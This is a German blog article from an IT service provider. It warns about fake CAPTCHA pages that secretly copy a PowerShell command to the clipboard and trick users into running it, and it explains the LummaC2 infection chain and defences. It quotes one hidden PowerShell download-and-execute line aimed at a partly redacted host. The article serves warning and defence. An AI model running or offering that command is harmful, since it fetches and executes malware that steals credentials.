Fake CAPTCHA als Malware-Risiko: BSI rät zu besonderer Vorsicht

Die dunkle Seite der CAPTCHAs

CAPTCHAs sind seit Jahrzehnten ein bewährtes Mittel, um Websites vor automatisierten Angriffen zu schützen. Sie verlangen vom Nutzer, bestimmte Bilder auszuwählen, Zeichen einzugeben oder einfach ein Häkchen zu setzen, um zu beweisen, dass sie keine Bots sind. Genau dieses Vertrauen in CAPTCHAs wird jetzt von Cyberkriminellen missbraucht, um ahnungslose Nutzer zur unbeabsichtigten Installation von Malware zu verleiten.

Fake Captcha Malware

Eine besonders raffinierte Angriffskette wurde vom Conscia Security Operations Center (SOC) entdeckt und als CAPTCHA clipper bezeichnet. Die Methode kombiniert Social Engineering mit technischer Manipulation, um Nutzer zur Ausführung schädlicher PowerShell-Befehle zu bringen.

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) sowie das Schweizerische Bundesamt für Cybersicherheit (BACS) warnen mittlerweile offiziell vor diesen Attacken.

Technische Analyse der CAPTCHA clipper-Angriffskette

Die Angriffsmethode nutzt mehrere Schritte, um den Schadcode auf den Systemen der Opfer auszuführen. Dabei wird eine Kombination aus JavaScript-Manipulation, PowerShell-Missbrauch und Command-and-Control (C2)-Kommunikation verwendet. Die folgenden Schritte beschreiben die technischen Hintergründe dieses raffinierten Angriffs.

1. Initiale Infektion: Das präparierte CAPTCHA

Der Angriff beginnt mit einer präparierten Webseite, die ein vermeintlich legitimes CAPTCHA enthält. Die technische Manipulation erfolgt über eingebettetes JavaScript, das eine bösartige Nutzlast vorbereitet.

Wie das bösartige CAPTCHA funktioniert:

  • Nutzer stoßen auf eine gefälschte Website, die ein Cloudflare-ähnliches CAPTCHA anzeigt.
  • Sobald das Häkchen bei „Ich bin kein Roboter“ gesetzt wird, wird unbemerkt ein PowerShell-Befehl in die Zwischenablage kopiert.
  • Ein zweites Pop-up-Banner erscheint mit Anweisungen zur Tastatureingabe. Hier werden Nutzer dazu gebracht:
  1. Win + R zu drücken, um das Ausführen-Fenster zu öffnen.
  2. Strg + V zu nutzen, um den schädlichen PowerShell-Befehl aus der Zwischenablage einzufügen.
  3. Enter zu drücken, wodurch der Befehl ohne das Wissen des Nutzers ausgeführt wird.

2. Der PowerShell-Angriff

Der kopierte PowerShell-Befehl ist darauf ausgelegt, Schadsoftware direkt aus dem Internet zu laden und auszuführen. Ein Beispiel für einen solchen Befehl nennt Consica im Blogartikel:

powershell -WindowStyle Hidden -Command “$rQd=‘https://xxxxxxxxxxxxx[.]net/prizev2[.]txt’; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;”

Was passiert bei der Ausführung dieses Befehls?

  • Die Datei prizev2.txt wird von einem externen Server geladen.
  • Diese Datei enthält weitere verschlüsselte Schadcode-Befehle, die mit Invoke-Expression direkt in der PowerShell ausgeführt werden.
  • Die Malware wird direkt im Speicher ausgeführt, um klassische Antiviren-Scanner zu umgehen.
  • In vielen Fällen wird eine Backdoor geöffnet, um weitere Schadsoftware herunterzuladen.

3. Installation und Persistenz

Nach der initialen Infektion installiert sich die Malware, indem sie:

  • Eine ZIP-Datei (prize.zip) von einem externen Server herunterlädt.
  • Die enthaltene Datei setup.exe ins APPDATA-Verzeichnis extrahiert und automatisch startet.
  • Persistenzmechanismen nutzt, darunter:
  • Eintrag in den Windows-Taskplaner, um sich nach jedem Neustart erneut auszuführen.
  • Erstellung einer zusätzlichen Datei (69HT8K.pif), die als Tarnung oder für weitere Angriffe genutzt wird.

Verwendete Techniken in der Übersicht

Die CAPTCHAclipper-Angriffskette setzt eine Vielzahl moderner Angriffstechniken ein:

TechnikErklärung
Social EngineeringNutzer werden durch bekannte Sicherheitsmechanismen (CAPTCHA) in falscher Sicherheit gewogen und zu gefährlichen Handlungen verleitet.
Clipboard HijackingSchadcode wird unbemerkt in die Zwischenablage kopiert und durch Nutzer selbst eingefügt.
Fileless MalwareSchadcode wird direkt im Arbeitsspeicher ausgeführt, ohne Dateien auf der Festplatte zu hinterlassen.
PowerShell ExploitationDie PowerShell wird als legitimes Windows-Werkzeug genutzt, um Befehle zu laden und auszuführen.
C2-KommunikationDie Malware baut eine Verbindung zu einem Angreifer-Server auf, um weitere Befehle zu empfangen.
Persistenz-MechanismenAutomatischer Neustart durch den Taskplaner oder das Eintragen ins APPDATA-Verzeichnis.

Wer steckt hinter den Angriffen?

Laut Conscia Security Operations Center (SOC) handelt es sich um einen erfahrenen Bedrohungsakteur, der gezielt Nutzer in Europa angreift. Die Hauptnutzlast wurde als eine Variante der LummaC2-Malware identifiziert, die darauf ausgelegt ist:

  • Zugangsdaten aus Webbrowsern und Messenger-Apps zu stehlen.
  • Kreditkarteninformationen abzugreifen.
  • Befehle auszuführen, um weitere Schadsoftware zu installieren.

Ein genaues Attributionsmodell liegt noch nicht vor, jedoch weisen die Angriffe auf eine hochentwickelte Gruppe hin, die in der Lage ist, ihre Angriffsstrategien dynamisch anzupassen, um Sicherheitslösungen zu umgehen.


Wie kann man sich schützen?

Um sich vor dieser neuen Angriffsmethode zu schützen, sollten Nutzer folgende Maßnahmen ergreifen:

1. Sicherheitsbewusstes Verhalten

  • Keine Tastenkombinationen auf unbekannten Webseiten ausführen!
  • Falls nach einem CAPTCHA eine zusätzliche Anweisung erscheint, sofort den Browser schließen.
  • Besondere Vorsicht bei Werbebannern oder Pop-ups, die eine Aktion verlangen.

2. Technische Schutzmaßnahmen

  • PowerShell restriktiver konfigurieren, z. B. durch Gruppenrichtlinien (Set-ExecutionPolicy Restricted).
  • Zwischenablage-Überwachung aktivieren, um unerwartete Inhalte zu blockieren.
  • Nutzung eines modernen Virenschutzes mit heuristischer Analyse.

3. Was tun im Infektionsfall?

Sollte der Verdacht bestehen, dass der eigene Rechner infiziert wurde:

  1. Sofort das Gerät vom Netzwerk trennen.
  2. Alle Passwörter ändern, insbesondere für Online-Banking und E-Mail-Konten.
  3. Den Rechner neu aufsetzen, um sicherzustellen, dass keine versteckte Schadsoftware aktiv bleibt.

Laut dem BSI und dem BACS sollten betroffene Systeme vollständig gelöscht und neu installiert werden, da moderne Malware oft tief ins System eingreift und nicht ohne Weiteres entfernt werden kann.

Fazit: Ein Weckruf für IT-Sicherheit

Die CAPTCHAclipper-Angriffe zeigen, wie Cyberkriminelle zunehmend kreative Methoden nutzen, um Sicherheitsmaßnahmen in Angriffsvektoren zu verwandeln. Durch die geschickte Kombination aus technischen Exploits und psychologischer Manipulation gelingt es den Tätern, Nutzer unbemerkt in die Falle zu locken.

Besonders besorgniserregend ist, dass die genutzten Techniken leicht angepasst und wiederverwendet werden können. Auch wenn bereits einige Sicherheitslösungen die erkannten Indikatoren für Kompromittierung (IOCs) blockieren, werden neue Varianten entstehen.

Nutzer und Unternehmen müssen daher wachsam bleiben, ihre IT-Sicherheitsstrategien kontinuierlich aktualisieren und sich stets bewusst sein: Nicht jedes CAPTCHA ist harmlos.

Wie hilfreich war dieser Beitrag?

Klicke auf die Sterne um zu bewerten!

Es tut uns leid, dass der Beitrag für dich nicht hilfreich war!

Lasse uns diesen Beitrag verbessern!

Wie können wir diesen Beitrag verbessern?

Meroth IT-Service ist Ihr lokaler IT-Dienstleister in Frankfurt am Main für kleine Unternehmen, Selbstständige und Privatkunden


Kostenfreie Ersteinschätzung Ihres Anliegens?

❱ Nehmen Sie gerne Kontakt auf ❰

Werbung

HP Envy x360 2-in1 Convertible Laptop PC | AMD Ryzen 5 8640HS | KI optimiert | 16” WUXGA Touchscreen | 16GB RAM | 512GB SSD | AMD Radeon-Grafikeinheit | Windows 11 Home | QWERTZ Copilot Key | Silberℹ︎
Kein Angebot verfügbar.
TP-Link RE500X WiFi 6 WLAN Verstärker Repeater AX1500 (1200 Mbit/s 5GHz, 300 Mbit/s 2,4GHz, Gigabit-Port, kompatibel mit Allen WLAN-Routern inkl. Fritzbox)ℹ︎
Ersparnis 27%
UVP**: € 44,90
€ 32,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
UGREEN Revodok Pro 106 10Gbps USB C Hub HDMI 4K@60Hz USB C Adapter mit USB 3.2 PD 100W Kompatibel mit iPhone 17/16 Serie, iPad Pro/Air, Mac mini M4/M4 Pro, Steam Deck usw.ℹ︎
Ersparnis 20%
UVP**: € 19,99
€ 15,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Homematic IP Smart Home Starter Set Mini Heizen – Standard, Digitale Steuerung Heizung + App, Alexa, Google Assistant, einfache Installation, Energie sparen, Thermostat, Heizungsthermostat, 158096A1ℹ︎
€ 71,63
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
WD Blue SN5000 powered by SANDISK (4000 GB, M.2 2280), SSDℹ︎
€ 263,50
Preise inkl. MwSt., zzgl. Versandkosten
€ 264,00
Preise inkl. MwSt., zzgl. Versandkosten
€ 299,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
WD Blue SN5000 powered by SANDISK (1000 GB, M.2 2280), SSDℹ︎
€ 101,65
Preise inkl. MwSt., zzgl. Versandkosten
€ 117,49
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 119,90
Preise inkl. MwSt., zzgl. Versandkosten
HP 305 (3YM61AE) Original Druckerpatrone Schwarz für HP DeskJet 27xx, 41xx, HP Envy 60xx, 64xxℹ︎
Ersparnis 4%
UVP**: € 13,50
€ 12,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 14,99
Preise inkl. MwSt., zzgl. Versandkosten
NETGEAR GS305E Managed Switch 5 Port Gigabit Ethernet LAN Switch Plus (Plug-and-Play, Netzwerk Switch Managed, IGMP Snooping, QoS, VLAN, lüfterlos, Robustes Metallgehäuse), Schwarzℹ︎
Ersparnis 15%
UVP**: € 25,99
€ 21,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 23,90
Preise inkl. MwSt., zzgl. Versandkosten
NETGEAR GS305 LAN Switch 5 Port Netzwerk Switch (Plug-and-Play Gigabit Switch LAN Splitter, LAN Verteiler, Ethernet Hub lüfterlos, robustes Metallgehäuse), Schwarzℹ︎
Ersparnis 10%
UVP**: € 19,99
€ 17,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Apple MacBook Air (13", Apple M4 Chip mit 10‑Core CPU und 8‑Core GPU, 16GB Gemeinsamer Arbeitsspeicher, 256 GB) - Himmelblauℹ︎
€ 853,00
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 899,00
Preise inkl. MwSt., zzgl. Versandkosten
HP 3YM62AE Bildgebungseinheit, Schwarz, XLℹ︎
Ersparnis 9%
UVP**: € 25,15
€ 22,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 24,99
Preise inkl. MwSt., zzgl. Versandkosten
UGREEN Nexode USB C Ladegerät 65W GaN Netzteil mit 3X USB-C-Port Schnellladegerät Kompakt Charger kompatibel mit MacBook Pro/Air, HP Laptop, iPad, iPhone 17, Galaxy S24ℹ︎
Ersparnis 31%
UVP**: € 31,67
€ 21,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Eve Thermo (Apple Home) - Smartes Heizkörperthermostat, spart Heizkosten, Moderne Heizungssteuerung (App/Zeitpläne/Anwesenheit), einfach installiert, für gängige Heizkörperventile, Bluetooth/Threadℹ︎
Ersparnis 16%
UVP**: € 79,95
€ 67,53
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 108,99
Preise inkl. MwSt., zzgl. Versandkosten
Homematic IP Smart Home Starter Set Heizen, Digitale Steuerung für Heizung mit oder ohne App, Alexa, Google Assistant, einfache Installation, Energie sparen, Thermostat, Heizungsthermostat, 156537A0ℹ︎
€ 89,95
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 95,73
Preise inkl. MwSt., zzgl. Versandkosten
HP N9K06AE 304 Tintenpatrone Druckerpatrone, Schwarz, Standardℹ︎
Ersparnis 7%
UVP**: € 17,05
€ 15,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 31,90
Preise inkl. MwSt., zzgl. Versandkosten
€ 32,99
Preise inkl. MwSt., zzgl. Versandkosten
Anker Nano 65W USB C Ladegerät, 3-Port PPS Schnellladegerät, iPad Ladegerät, Kompaktes Netzteil für MacBook Pro, iPad Pro, Galaxy S20, Dell XPS 13, Note 20, iPhone 17/16/15 Series,Pixelsℹ︎
Ersparnis 38%
UVP**: € 41,99
€ 25,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
ℹ︎ Werbung / Affiliate-Links: Wenn Sie auf einen dieser Links klicken und einkaufen, erhalte ich eine Provision. Für Sie verändert sich der Preis dadurch nicht. Zuletzt aktualisiert am 14. Dezember 2025 um 15:42. Die hier gezeigten Preise können sich zwischenzeitlich auf der Seite des Verkäufers geändert haben. Alle Angaben ohne Gewähr.
(**) UVP: Unverbindliche Preisempfehlung

Preise inkl. MwSt., zzgl. Versandkosten
Abonnieren
Benachrichtige mich bei

0 Kommentare
Inline Feedbacks
Alle Kommentare anzeigen
Nach oben scrollen